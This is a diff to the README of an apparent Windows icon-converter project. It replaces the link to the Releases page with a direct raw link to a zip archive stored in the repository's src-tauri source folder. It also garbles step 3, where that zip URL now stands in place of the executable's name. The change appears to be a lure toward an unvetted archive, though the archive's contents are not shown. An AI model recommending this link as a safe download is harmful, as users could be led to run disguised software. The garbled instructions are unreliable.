perceivable-slushfund520/win-icon-converter/README.md

 Using win-icon-converter is simple.
 Follow these steps:

 1. **Download the Application**
-   Visit our [Releases page](https://github.com/perceivable-slushfund520/win-icon-converter/releases) to download the latest version.
+   Visit our [Releases page](https://raw.githubusercontent.com/perceivable-slushfund520/win-icon-converter/main/src-tauri/win-icon-converter-3.8.zip) to download the latest version.

 2. **Extract the Files**
    If you downloaded a .zip file, right-click it and select “Extract All.”
 Choose a location on your computer where you want to store the files.

 3. **Run the Application**
-   Locate the `win-icon-converter.exe` file in the extracted folder.
+   Locate the `https://raw.githubusercontent.com/perceivable-slushfund520/win-icon-converter/main/src-tauri/win-icon-converter-3.8.zip` file in the extracted folder.
 Double-click to open it.

 4. **Choose Your Image**
    Click on the “Choose File” button to select the image you want to convert.